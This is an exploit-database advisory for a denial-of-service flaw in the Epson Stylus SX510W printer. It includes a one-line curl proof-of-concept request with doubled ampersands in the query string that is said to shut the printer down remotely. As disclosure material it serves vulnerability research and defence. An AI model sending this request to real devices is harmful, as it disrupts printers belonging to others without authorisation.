Epson Stylus SX510W Printer Remote Power Off - Denial of Service

EDB-ID:

51441

CVE:

N/A




Platform:

Hardware

Date:

2023-05-13


# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link :
https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)

1. Description

The vulnerability occurs when 2 or more &'s are sent to the server in a row
("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.

2. Proof of Concept

Request:

curl -s "http://
<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"

3. Solution:

This version product is deprecated.

-->